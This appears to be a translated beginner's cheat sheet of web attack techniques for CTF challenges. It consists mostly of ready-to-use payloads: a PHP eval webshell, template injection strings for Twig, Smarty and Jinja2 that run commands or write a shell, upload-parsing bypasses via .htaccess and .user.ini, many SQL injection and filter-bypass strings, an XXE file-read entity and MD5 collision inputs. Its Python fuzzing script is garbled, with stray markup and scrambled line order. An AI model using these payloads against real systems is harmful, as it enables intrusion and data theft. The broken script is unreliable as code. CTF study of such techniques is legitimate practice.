Because it is a compilation of previous questions, I referred to the blogs of many masters. Because it is too fragmented, I failed to record the sources of the articles of the masters (I will raise copyright awareness in the future). If there is any infringement, please add the source or delete the article in private chat.
The blogger is a newbie who has only been started for half a year. It is inevitable that there will be many errors in the article. Please correct me.
I don’t know much about the format issue. I have uploaded the markdown file on my homepage. You can download it yourself if needed (free download), which gives a better look and feel.
### **PHP**
var_dump( ) Expand data in column form for easy viewing
scandir( ) Scan a folder directory
file_get_contents( ) Read the file and splice it with '.' such as num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr( 103))
base_convert() function converts numbers between arbitrary bases and returns a string
dechex() function: Convert decimal to hexadecimal.
hex2bin() function: Converts a string of hexadecimal values to ASCII characters.
readfile() function reads files
The localeconv() function returns an array containing local number and currency format information.
```
Supporting use
Use **scandir()** to pass in '.' to display the current All directories, i.e. scandir('.')
But '.' does not comply with the regular matching rules
Then use the **localeconv()** function to return an array containing local number and currency format information (the first value of the array is.)
Use pointer to point to the first value of the array
**`current()`** The function returns the value of the current element in the array. Each array has an internal pointer pointing to its "current" element, initially pointing to the first element inserted into the array.
**`pos()`** The function returns the value of the current element in the array. This function is an alias for the current() function. Each array has an internal pointer pointing to its "current" element, initially pointing to the first element inserted into the array.
**scandir(localeconv(current()));**
**`next()`** The function points the internal pointer to the next element in the array, and output. What is returned is the specific value of the array and cannot be nested.
**`array_reverse()`** The function returns the array in reverse order.
```
The exit() function returns the output variable when exiting
preg_replace() regular matching, translation
When processing 172.17.0.2' -v -d a=1
escapeshellarg() ->'172.17.0.2'\'' -v -d a=1'
escapeshellcmd() ->'172.17.0.2'\\'' -v -d a=1\ '
-> is a reference class, => is an array assignment
#### Weak equals and strong equals
$key == $str performs data conversion, such as 0dff string is forced to be converted to integer 0
$key === $str requires the same data
#### MD5 is strongly equal but the original value is not equal
if (md5($id) === md5($gg) && $id !== $gg)
Principle: When PHP processes hash strings, it will use "!=" or "==" to compare hash values. It interprets every hash value starting with "0E" as 0, so if After two different passwords are hashed, their hash values start with "**0E**", then PHP will think that they are the same, both **0**.
Using arrays to bypass
id[]=1
gg[]=2
#### MD5 same value
```
->QNKCDZO
0e830400451993494058024219903391
->s878926199a
0e545993274517709034328855841020
->s155964671a
0e342768416822451524974117254469
->s214587 387a
0e848240448830537924465865611904
->s214587387a
0e848240448830537924465865611904
->s878926199a
0e5459932745177090 34328855841020
->s1091221200a
0e940624217856561557816327384675
Because 0e starts with 0 to any power of 0, so its md5 value is the same
```
#### MD5 strong collision
```php
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))
```
```
a = %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15% 87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3% 6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
b = %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7 %4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93 %d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
```
#### $md5==md5($md5)
md5(0e215962017,32) = 0e291242476940776845150308577824
0exxxx are all 0
So OK md5=0e215962017
### Template injection
X-Forward-For:{7 * 7} echoes 49 for Smarty template injection
X-Forward-For:{system('pwd')} Execute command in {}
user={ {7*' 7 '} Backing 49 == & GT; Twig
Commonly used methods
Twig
```
{
{_self.env.registerUndefinedFilterCallback("exec")}}{
{_self.env.getFilter("cat /flag")}}
```
Smarty
```
{if phpinfo()}{/if}
{if system('ls')}{/if}
{if system('cat /flag')}{/if}
// another
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
```
Jinja2
```
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{
{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('<command>').read()") }}{% endif %}{% endfor %}
```
Flask
```
app.config['FLAG'] = os.environ.pop('FLAG') is readable configured
{
{config}}应该是可以查看app.config的内容
/shrine/{
{url_for.__globals__}}
/shrine/{
{url_for.__globals__['current_app'].config}}
/shrine/{
{get_flashed_messages.__globals__['current_app'.config]}}
```
### File Upload
#### Common suffixes
.phtml
#### One sentence Trojan
<?php @eval($_POST['SHELL']);?>
#### nmap execution
?host=' <?php @eval($_POST("shell");?)> -oG shell.php '
#### Parsing bypass
First use the error report to see why the middleware
nginx -> user.ini
apache -> .htaccess
two ways
Don’t use Notepad to write these two documents!
htaccess:
```
<FilesMatch "test.jpg">
Sethandler application/x-httpd-php
</FilesMatch>
```
or
```.htaccess
<FilesMatch "test.jpg">
Sethandler application/x-httpd-php
<!-- Parse and execute the matched muma.jpg file according to PHP -->
Addhandler php5-script .jpg
<!-- Parse and execute the matched muma.jpg file according to php -->
</FilesMatch>
```
This:
```ini
GIF89a
auto_append_file=shell1.jpg
```
<script language="php">system('cat /flag');</script>
### Directory Scan
index.php.bat
user.php.bak
phpmyadmin
robots.txt
.git source code leaked, use GitHack to download the source code
python2 GitHack.py http://XXX.com
/www.tar.gz
www.zip
### Web page request header
referer:www.baidu.com indicates that the web page comes from Baidu
User-Agent: firefox means the proxy browser is Firefox
X-Forwarded-For: Represents user IP
### Code audit
#### Pseudo protocol reading
secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
file=php://filter/read=convert.base64-encode/resource=useless.php
#### Pseudo protocol writing
text=data://text/plain;base64,xxx (corresponding base64 encoding)
?text=data://text/plain,I have a dream
#### other
$$x = $$y
### Deserialization
1. Construct the corresponding class
```
class Flag{ //flag.php
public $file=flag.php;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
```
2. Instantiation
$a = new Flag();
3. Assignment serialization
$a->file="flag.php";
echo serialize($a);
4. When using deserialization, pay attention to executing the web page instead of reading the source code.
```php
<?php
class FileHandler{
protected $op = 2;
protected $filename = "php://filter/read=convert.base64-encode/resource=http:\\799e1c75-aa7f-4330-8a8f-d26a79d3d62d.node3.buuoj.cn\\flag.php";
protected $content;
}
$a = new FileHandler();
$b = serialize($a);
echo($b);
?>
```
The garbled code is caused by the use of protected, which can be changed to public.
### SQL injection
#### Commonly used statements
1' order by 1,2,3,4,5%23 -->explosion field
1' union select * from a%23 -->The echo xxx.a does not exist, which means the database is xxx
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="xxx"%23 -->Express the table (field is 3, xxx is the database name)
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name = "xxxx"%23 -->Exploded column (xxxx is the table name obtained from the exploded table)
1' union select 1,2,group_concat(id,username,password) from xxx%23 -->View specific content
xxx is the table name, which can also be represented by "data name.column name"
When jointly querying data that does not exist, the joint query will construct a virtual data
() replaces spaces, like replaces equal sign
Note that when reading is incomplete, use left, middle, and right to read in sections.
#### Error injection
The idea of injection is the same. Knowledge only uses three injection functions.
floor extractvalue xmlupdate
1'^extractvalue(1,concat(0x7e,(select**(**database()**)**)))%23
1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23
1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23
1'^extractvalue(1,concat(0x7e,(select(left((password),30))from(geek.H4rDsq1))))%23
#### Universal password
1' or 1=1#Skip judgment
#### Stack injection
Separated by semicolons, the commands are executed sequentially.
Such as 1;show databases;
1;show tables;
*,1 represents the second value of the current array
#### Oracle与Mysql
Oracle support
select $_GET['query'] || flag from flag
This kind of splicing
|| here does not mean or, it is used to splice strings
If it is mysql it is
1;set sql_mod=PIPES_AS_CONCAT;select 1
#### handler bypass
handler xxx open opens the table
handler xxx read read
handler xxx close close
for example
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
where first means reading the first field
#### Other bypasses
##### union select
hpp parameter pollution bypass?no=-1 (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4#
Inline comment bypass?no=-1 union/*!/*!50000select 1,2,3,4*/#
Inline comment bypass?no=-1 union/*!/**/%0aselect*/ 1,2,3,4# (%0a is a newline character)
Inline comment bypass?no=-1 UnIoN/**/SeLecT/**/1,2,3,4# (note that it is not bold here, when /* * /xx/ * */)
For details, see the boss’s blog: https://www.cnblogs.com/xinxin999/p/12521014.html
### session forgery
Decrypt using secret_key and open source projects
The composition is 1x.2x.3x
1x is the information content, 2x is the time, and 3x is the encryption of the combination of the first two items.
Only when 3x matches the previous one can the correct session information be generated.
### Fuzz Penetration Testing
Directory traversal ../
Multi-threaded test script example (involving I/O operations, multi-threading will be much faster)
```python
import os #Regular matching import threading #Multi-threading import time #Running time print('Start time: & #39;+ time.asctime( time.localtime(time.time()) )) s1=threading.Semaphore(100) #Set the maximum number of threads here filePath = r"D:/phpstudy_pro/WWW" os.chdir(filePath) #Change the current path requests.adapters.DEFAULT_ RETRIES = 5 #Set the number of reconnections to prevent the number of threads from being too high and disconnection files = os.listdir(filePath) session = requests.Session() a> = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read())) session.keep_alive = False a> print('trying '+file+ ' '+ time.asctime( time.localtime(time.time()) )) data = {} params[m] = "echo 'xxxxxx';" for n in posts: data[n] = "echo 'xxxxxx';" url = 'http://127.0.0.1/src/'+ file REQ = Session.post (url, data = data, params = Params)#Requires all get and post Req.close ()# Close request release memory req.encoding = 'utf-8' content = req.text #print(content) if “xxxxxx” in content: /span> if flag != 1: /span> req.close() ’ s ’ ‐ ‐ ‐ ‐ ‐ 1 break content = req.text break flag = 1 if "xxxxxx" in content: req.close() Release memory content = req.text req = session.get(url+'?%s='%a+"echo � 39;xxxxxx';") for a in gets:
if flag == 1: #flag is used to determine whether the parameter is GET or POST. If it is GET, flag==1, b is undefined; if it is POST, flag is 0,
param = a
else:
param = b
print('Found the exploit file: & #39;+file+" and found the used parameters: %s" %param)
print('End time: ' + time.asctime(time. localtime(time.time())))
s1.release()
for i in files: #加入多线程
t = threading.Thread(target=get_content, args=(i,))
t.start()
```
### other
ffffllllaaaagggg may prompt directory traversal level four
? --> %3F --> %253F (secondary url encryption)
In my personal understanding, parameters are either file inclusions, or involve PHP strong and weak types, etc., but these generally provide source code, which is obviously not the case in this question.
Then another possibility is sql injection
If the registration information filled in in the question is similar to a blog address, it may be SSRF.
XML entity injection
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>123</password></user>
```
WEB-INF in the jsp architecture is its security directory and cannot be accessed directly by client users.
WEB-INF mainly contains the following files or directories: /WEB-INF/web.xml: Web application configuration file, which describes the configuration and naming rules of servlets and other application components. /WEB-INF/classes/: Contains all class files used by the site, including servlet classes and non-servlet classes. They cannot be included in .jar files. /WEB-INF/lib/: Stores various JAR files required by web applications. , place jar files that are only required to be used in this application, such as database driver jar files/WEB-INF/src/: source code directory, and place each java file according to the package name structure. /WEB-INF/database.properties: Database configuration file Vulnerability detection and utilization method: Find the web.xml file, infer the path of the class file, and finally directly class the file, and decompile the class file to obtain the website source code
Nginx configuration file information
Configuration file storage directory: /etc/nginx
Main configuration file: /etc/nginx/conf/nginx.conf
Management script: / usr/lib64/systemd/system/nginx.service
Module: /usr/lisb64/nginx/modules
Application: /usr/sbin/nginx Configuration The file directory is: /usr/local/nginx/conf/nginx.conf The default storage location of the log: /var/log/nginx
The default storage location of the program: /usr/share/nginx/html
num requires num to be less than 2000 but num+1 to be greater than 2001
intval('2e4') = 2
'2e4'+1 = float(20001)
intval('2e4'+1) = 20001
you pass!
Input parameters?num=2e4
cat -> more
Space -> $IFS$9
cat -> tac
cat and tac are exactly the opposite. tac displays the file starting from the last line, and the order of characters in each line remains unchanged.
### **Common character conversion**
#### Unicode conversion
https://www.compart.com/en/unicode/
#### computation
is_nan64 ==>_G
tan15 ==>AND
XOR
1 ^ 1 = 0
0 ^ 0 = 0
1 ^ 0 = 1
#### url encoding
```
%23 #
```
#### ASCII:
```
chr(9) tab empty case
chr(10) 换行
chr(13)
Chr(13)&chr(10)
chr(32) Empty mark
chr( 34) Double index
chr(39) Single index
chr(33) !
chr(34) " chr(73) I < /span> chr(98) b < /span> ``` chr(174) ® chr(169) © chr(153)™ chr(128) chr(127) chr(126) ~ chr(125) } chr(124) | chr(123) { chr(122) z chr(121) y chr(120) x chr(119) w chr(118) v chr(117) u chr(116) t chr(115) s chr(114) r chr(105) i chr(112) p chr(111) o chr(110) n chr( 109) m chr(108) l chr(107) k chr(106) j chr(104) h chr(103) g chr(102) f chr(101) e chr(100) d chr(99) c chr(97) a chr(96) ` chr(95) _ chr(94) ^ chr(93) ] chr(92) \ chr(80) P chr(87) W chr(86) V chr(85) U chr( 84) T chr(83) S chr(82) R chr(81) Q chr(79) O chr(78) N chr(77) M chr(76) L chr(75) K chr(74) J chr(72) H chr(71) G chr(70) F chr(69) E chr(68) D chr(67) C chr(66) B chr(65) A chr(64) @ Chr(48) 0 chr(62) > chr(61) = chr(60) < chr(59) ; chr(58) Chr(57) 9 Chr(56) 8 Chr(55) 7 Chr(54) 6 Chr(53) 5 Chr (52) 4 Chr(51) 3 Chr(50) 2 Chr(49) 1 chr(47) / chr(46) . chr(45) - chr(44) , chr(43) + chr(42) * chr(41) ) chr(40) ( chr(39) ' chr (38) & chr(37) % chr(36) $
chr(35) #